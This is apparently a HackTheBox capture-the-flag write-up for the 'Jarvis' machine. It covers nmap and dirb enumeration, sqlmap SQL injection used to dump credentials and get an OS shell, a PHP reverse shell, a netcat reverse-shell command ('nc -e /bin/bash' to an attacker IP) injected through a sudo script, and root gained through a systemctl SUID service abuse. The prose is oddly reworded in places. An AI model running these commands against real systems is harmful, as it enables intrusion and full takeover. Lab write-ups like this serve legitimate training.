Jarvis — HackTheBox Writeup

Jarvis is a Norman French surname (last name) linked to Saint Gervasius.
Its Latin meaning is “He who is skilled with a spear.”

Jarvis was a basic and fun box. I’ll begin by finding an SQLi in one of the site pages and get a fundamental shell utilizing sqlmap and afterwards sidestep a channel on a sudo record to get to the client banner. To get to the root, I’ll misuse a suid paired to acquire root shell

This is a writeup for the Jarvis machine

Enumeration:

1.NMAP SCAN: CHECK SERVICES

The primary activity is to figure out what services are running on the objective IP address by executing Nmap against 10.10.10.143 IP.

Akuma@kali:~$ nmap -T4 -A -O -v -p - 10.10.10.143

The Nmap scan reveals 3 running services:
-SSH on port 22,
-Apache 2.4.25 on port 80 and 64999

PORT      STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_Supported Methods: GET HEAD POST OPTIONS
|http-server-header: Apache/2.4.25 (Debian) |_http-title: Stark Hotel
64999/tcp open http Apache httpd 2.4.25 ((Debian)) | http-methods: |
Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).

2. DIRBUSTER: FIND ENTRY POINTS WITHIN THE WEB APPlication.

We use the tool “Dirbuster” to scan the webserver to enumerate different files and folders.
I was able to find the PHPMyAdmin version which is v4.8.0 that is installed under Http://10.10.10.143/phpmyadmin, which is exploitable via Local File.

Akuma@kali:~$ dirb http://10.10.10.143/
-----------------
[...]
URL_BASE: http://10.10.10.143/
[...]
---- Scanning URL: http://10.10.10.143/ ----
==> DIRECTORY: http://10.10.10.143/css/
==> DIRECTORY: http://10.10.10.143/fonts/
==> DIRECTORY: http://10.10.10.143/images/
+ http://10.10.10.143/index.php (CODE:200|SIZE:23628)
==> DIRECTORY: http://10.10.10.143/js/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/
+ http://10.10.10.143/server-status (CODE:403|SIZE:300)
[...]
---- Entering directory: http://10.10.10.143/phpmyadmin/ ----
+ http://10.10.10.143/phpmyadmin/ChangeLog (CODE:200|SIZE:19186)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/doc/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/examples/
+ http://10.10.10.143/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://10.10.10.143/phpmyadmin/index.php (CODE:200|SIZE:15211)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/js/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/libraries/
+ http://10.10.10.143/phpmyadmin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/locale/
+ http://10.10.10.143/phpmyadmin/phpinfo.php (CODE:200|SIZE:15228)
+ http://10.10.10.143/phpmyadmin/README (CODE:200|SIZE:1520)
+ http://10.10.10.143/phpmyadmin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://10.10.10.143/phpmyadmin/setup/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/sql/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/templates/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/themes/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/tmp/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/vendor/

The port 64999 always shows:

so, its a rabbit hole

3.sqlmap

Reading the HTML or navigating through the page you will eventually find a URL like this

Attempting SQL injection manually through the URL bar didn’t help. In this instance, so I have used sqlmap to do this task.

After a few trials of play with that parameter, I could found that it is vulnerable to SQL Injection.

SQLMap:

sqlmap -u http://10.10.10.143:80/room.php?cod=1 — random-agent — level 1 — risk 1 — hostname — current-user — users — passwords — batch

and by this, I was able to get the credentials

password hash and the clear-text

the sqlmap has successfully found the password which can be used to log in the PHPmyadmin page.

Now using sqlmap we can get a shell to Jarvis to do that I have used below command

sqlmap -u http://10.10.10.143:80 — crawl=3 — random-agent — level1 — risk 1 — os-shell — batch

we still can’t read the flag but we can execute commands inside the Host we can upload a PHP reverse shell and execute.

I have downloaded pentest monkey PHP reverse shell on the host:

Accessing this shell opens a real shell to the system which is www-data now to escalate the privileges on the system I have used PEASS (Privilege Escalation Awesome Scripts SUITE)

It is possible to execute this script as pepper.

Executing it, you will find that there is an option to ping an IP address:

To get a reverse connection I have used the below script:

script: echo “nc -e /bin/bash 10.10.14.13 5566” > rev2.sh

And now it can be called from the script created earlier:

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

owning user: as pepper, I was able to read the user.txt file: 2afa36c4f05b37b34259c93551f5c44f(flag)

Root: Executing linpe as pepper I have easily found the root flag by privileges exploiting the SUID bit of systemctl.

Exploiting the SUID

To exploit it you have to create a new .service file:

pepper@jarvis:~$ cat /home/pepper/suidpe.service

This service file will execute a script whenever it is started

pepper@jarvis:~$ cat /home/pepper/pe.sh

cp /bin/bash /home/pepper/b; chmod +s /home/pepper/b

Finally create and execute the new service :

pepper@jarvis:~$ systemctl link /home/pepper/suidpe.service

pepper@jarvis:~$ systemctl enable — now

/home/pepper/suidpe.service

pepper@jarvis:~$ systemctl start suidpe.service

This will create a file /home/pepper/b (a copy of /bin/bash with the SUID set

by root).

upon executing it we get the root, and we can easly read the flag:

pepper@jarvis:~$ /home/pepper/b -p

b-4.4# cat /root/root.txt

d41d8cd98f00b204e9800998ecf84271(the root flag)

Wanna connect:

Linkedin: https://www.linkedin.com/in/akshay-jain-533a79111/

Email: Akshayjain5@protonmail.com

you can also visit my GitHub account: https://github.com/akshay1729

Mr Akuma | cyber security enthusiast |Secuirty Noob

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store